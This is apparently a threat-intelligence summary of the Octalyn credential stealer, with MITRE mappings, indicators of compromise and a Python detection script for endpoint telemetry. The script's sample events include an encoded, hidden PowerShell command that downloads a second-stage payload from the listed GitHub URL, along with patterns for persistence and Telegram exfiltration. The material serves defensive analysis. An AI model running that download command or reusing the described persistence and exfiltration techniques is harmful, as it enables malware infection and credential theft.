The Octalyn Forensic Toolkit is a C++ and Delphi-based credential stealer disguised as a forensic research tool, capable of extracting browser data, cryptocurrency wallets, and social media tokens, with data exfiltration conducted via Telegram. Its modular design, persistence mechanisms, and obfuscated payloads make it a significant threat when misused by malicious actors. #OctalynForensicToolkit #TelegramBuild.exe #CredentialStealer
Keypoints
- The Octalyn Forensic Toolkit is publicly available on GitHub, consisting of a Delphi-based builder and a C++ payload module for credential theft and data exfiltration.
- The malware steals browser cookies, passwords, autofill data, Discord and Telegram tokens, VPN configurations, gaming credentials, and cryptocurrency wallet information.
- Data exfiltration is performed covertly through a Telegram bot using embedded bot tokens and chat IDs for real-time communication.
- The Toolkit establishes persistence on Windows via Startup folder copying and registry Run key modification to ensure continuous operation.
- The payload employs obfuscation and packing to evade detection, dropping multiple executables silently into the %TEMP% directory using Windows API functions.
- A Base64-encoded PowerShell script downloads a secondary payload from a GitHub repository, indicating ongoing threat actor control and potential future attacks.
- The stolen data is organized into structured directories (e.g., Crypto wallets, VPN, Browsers) to facilitate efficient use by attackers.
MITRE Techniques
- [T1189] Drive-by Compromise – The source ties initial access to the toolkit being freely downloadable from GitHub (“The Octalyn Forensic Toolkit, publicly hosted on GitHub”); note that public hosting of the builder describes distribution rather than a true drive-by, so treat this mapping loosely.
- [T1059] Command and Scripting Interpreter – Uses PowerShell scripts for payload execution and data compression (“uses a PowerShell script to compress the stolen data into a ZIP archive”).
- [T1059.001] PowerShell – Executes Base64-encoded PowerShell commands in hidden mode to download additional payloads (“The malware then uses a Base64-encoded PowerShell command, executed in hidden mode”).
- [T1204] User Execution – The built stealer is an executable a victim must run; the source adds that producing it needs no more than a Telegram bot token and chat ID from the operator (“The builder requires only a Telegram bot token and chat ID”).
- [T1547.001] Registry Run Keys / Startup Folder – Establishes persistence by copying payload to Startup folder and modifying HKCU Run keys (“rvn.exe is copied to the Startup folder… It also modifies the Windows Registry Run key”).
- [T1140] De-obfuscate/Decode Files or Information – The packed builder unpacks and drops its embedded executables at run time, which hinders static analysis (“Build.exe has an entropy score above 7, indicating that it is packed or obfuscated”).
- [T1027] Obfuscated Files or Information – Payloads are obfuscated to evade detection (“high obfuscation and further confirming that the embedded files are designed to evade analysis”).
- [T1124] System Time Discovery – Listed by the source among the techniques observed during execution, without further detail on how the time value is used.
- [T1010] Application Window Discovery – Mapped by the source to the payload running without a visible window (“executed silently in a hidden Windows shell”); hidden execution is more precisely T1564.003 (Hide Artifacts: Hidden Window).
- [T1018] Remote System Discovery – Listed by the source among the discovery techniques observed, without detail on what remote hosts are enumerated.
- [T1217] Browser Information Discovery – Extracts cookies, passwords, and browser session tokens (“The malware extracts cookies, which are decrypted using Chrome’s local encryption keys”).
- [T1083] File and Directory Discovery – Searches and creates directories for stolen data (“creates subdirectories such as Cryptowallets and Extension”).
- [T1082] System Information Discovery – Collects system information as part of data theft (“system information”).
- [T1012] Query Registry – Queries and modifies registry keys for persistence (“creates a new Run key under HKCU\Software\…”).
- [T1560] Archive Collected Data – Uses PowerShell to compress collected data into ZIP archives (“compress the stolen data into a ZIP archive”).
- [T1573] Encrypted Channel – Exfiltrates data over encrypted Telegram API communication (“a secure connection over TLS to the Telegram API endpoint”).
- [T1095] Non-Application Layer Protocol – Mapped by the source to the Telegram C2 channel (“Telegram C2 integration”); since the Telegram Bot API is reached over HTTPS, T1071.001 (Web Protocols) is the closer fit.
- [T1071] Application Layer Protocol – Communicates over Telegram bot API for data exfiltration (“transmit exfiltrated data and receive commands from the attacker-controlled Telegram bot”).
Indicators of Compromise
- [File Hashes] Malicious executables related to Octalyn components – 8bd9925f7b7663ca2fcb305870248bd5de0c684342c364c24ef24bffbcdecd8b (Octalynstealer.exe), 3b3a096a9c507529919f92154f682490fa8e135f3460549a917cf23113a7b828 (Build.exe), 8bb868a4bd9ed5e540c3d6717b0baa1cd831fc520ee02889bc55e2aac66d9d34 (rvn.exe), cea94fd48ef98f6e9db120cdb33fa1099846ebcf9e6d6f8de3b53250d2087f0a (asembly.exe)
- [File Hashes] Additional payload and helper tools – 8af7fc21bc9c13d877f598886f363a4c7c1105bcda18e17db74d7e1584a9cae2 (TelegramBuild.exe), abe96669d90f52529b5dad847f43961a4b8b56c3893f6233a404b688c5a6069e (svchost.exe), 44778cf0de10af616ef2d8a5cc5048f7cf0faa204563eab590a1a9ea4a168ef7 (binder.exe)
- [URL] GitHub-hosted payload delivery URL – github[.]com/git-user691/psycho/releases/download/v1/rundll32.exe (used to download the second-stage payload)
- [File Names] Dropped executables and data folders – TelegramBuild.exe, rvn.exe, assembly.exe (spelled asembly.exe in the hash list above; hunt for both), folder %TEMP%\Octalyn with subdirectories such as Cryptowallets and Extension for stolen data storage
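The behaviours above (hidden, Base64-encoded PowerShell fetching the GitHub second stage; Run-key and Startup-folder persistence; drops into %TEMP%; Telegram Bot API traffic) and the IOC hashes can be turned into a small triage pass over endpoint telemetry. The script below is an added example, not code from the report or from the toolkit: the Sysmon-style event shape, the field names, and the PowerShell one-liner inside the encoded command are constructed assumptions, since the report gives only the download URL and the fact that the command runs encoded and hidden. The hashes, file names and URL are the ones listed above.

```python
"""Triage constructed Sysmon-style events for Octalyn stealer tradecraft."""
import base64
import re
from typing import Dict, List, Tuple

# SHA-256 values from the Indicators of Compromise section of the report.
OCTALYN_SHA256 = {
    "8bd9925f7b7663ca2fcb305870248bd5de0c684342c364c24ef24bffbcdecd8b",  # Octalynstealer.exe
    "3b3a096a9c507529919f92154f682490fa8e135f3460549a917cf23113a7b828",  # Build.exe
    "8bb868a4bd9ed5e540c3d6717b0baa1cd831fc520ee02889bc55e2aac66d9d34",  # rvn.exe
    "cea94fd48ef98f6e9db120cdb33fa1099846ebcf9e6d6f8de3b53250d2087f0a",  # asembly.exe
    "8af7fc21bc9c13d877f598886f363a4c7c1105bcda18e17db74d7e1584a9cae2",  # TelegramBuild.exe
    "abe96669d90f52529b5dad847f43961a4b8b56c3893f6233a404b688c5a6069e",  # svchost.exe
    "44778cf0de10af616ef2d8a5cc5048f7cf0faa204563eab590a1a9ea4a168ef7",  # binder.exe
}
# Dropped names from the IOC section; the report spells the fourth one both ways.
DROPPED_NAMES = {"telegrambuild.exe", "rvn.exe", "assembly.exe", "asembly.exe"}
# Second-stage download location from the IOC section, with the defanging removed.
SECOND_STAGE_URL = "github.com/git-user691/psycho/releases/download/v1/rundll32.exe"

ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_FLAG = re.compile(r"-w[a-z]*\s+hidden", re.I)          # -w / -win / -WindowStyle hidden
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
TEMP_DIR = re.compile(r"%TEMP%|\\AppData\\Local\\Temp\\", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the script inside a -EncodedCommand argument, or '' if absent or undecodable.
    PowerShell expects Base64 over UTF-16LE, so that is the decoding attempted here."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def triage_event(ev: Dict[str, str]) -> List[str]:
    """Return the detection labels that fire for one event (empty list = nothing suspicious)."""
    hits: List[str] = []
    if ev.get("sha256", "").lower() in OCTALYN_SHA256:   # applies to any event carrying a hash
        hits.append("known_octalyn_hash")
    kind = ev.get("type", "")
    if kind == "process_create":
        cmd = ev.get("cmdline", "")
        script = decode_encoded_command(cmd)
        if script:
            hits.append("encoded_powershell")
            if SECOND_STAGE_URL in script.lower():
                hits.append("second_stage_github_download")
        if HIDDEN_FLAG.search(cmd):
            hits.append("hidden_window")
    elif kind == "registry_set":
        if RUN_KEY.search(ev.get("key", "")):
            hits.append("run_key_persistence")
            if TEMP_DIR.search(ev.get("value", "")):   # Run entry launching from %TEMP%
                hits.append("run_key_targets_temp")
    elif kind == "file_create":
        path = ev.get("path", "")
        if STARTUP_DIR.search(path):
            hits.append("startup_folder_drop")
        if path.rsplit("\\", 1)[-1].lower() in DROPPED_NAMES and TEMP_DIR.search(path):
            hits.append("octalyn_drop_in_temp")
    elif kind == "network_connect":
        if ev.get("host", "").lower() == "api.telegram.org":
            hits.append("telegram_bot_api")
    return hits


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Run every event through triage_event and keep only the ones with at least one hit."""
    flagged = []
    for ev in events:
        hits = triage_event(ev)
        if hits:
            flagged.append((ev["id"], hits))
    return flagged


def _encode(script: str) -> str:
    """Encode a script the way 'powershell -EncodedCommand' expects (for the constructed sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry (assumed shapes and values, not from the report).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"id": "1", "type": "file_create",
     "path": r"C:\Users\alice\AppData\Local\Temp\Octalyn\rvn.exe",
     "sha256": "8bb868a4bd9ed5e540c3d6717b0baa1cd831fc520ee02889bc55e2aac66d9d34"},
    {"id": "2", "type": "file_create",
     "path": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rvn.exe"},
    {"id": "3", "type": "registry_set",
     "key": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run\rvn",
     "value": r"C:\Users\alice\AppData\Local\Temp\Octalyn\rvn.exe"},
    {"id": "4", "type": "process_create",            # assumed one-liner; only the URL is from the report
     "cmdline": "powershell.exe -w hidden -enc " + _encode(
         "Invoke-WebRequest -Uri https://" + SECOND_STAGE_URL + " -OutFile $env:TEMP\\rundll32.exe")},
    {"id": "5", "type": "network_connect", "host": "api.telegram.org", "port": "443"},
    {"id": "6", "type": "process_create", "cmdline": "powershell.exe -NoProfile -Command Get-Date"},  # benign control
]

if __name__ == "__main__":
    for ev_id, hits in triage(SAMPLE_EVENTS):
        print(ev_id, ", ".join(hits))
```

On real Sysmon data the same checks map to Event ID 1 (process creation, with the `Hashes` field), 11 (file creation), 13 (registry value set) and 3 (network connection); the benign control event shows that a plain `-Command` invocation produces no hit, so the encoded-plus-hidden combination is what carries the signal.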
Read more: https://www.cyfirma.com/research/octalyn-stealer-unmasked/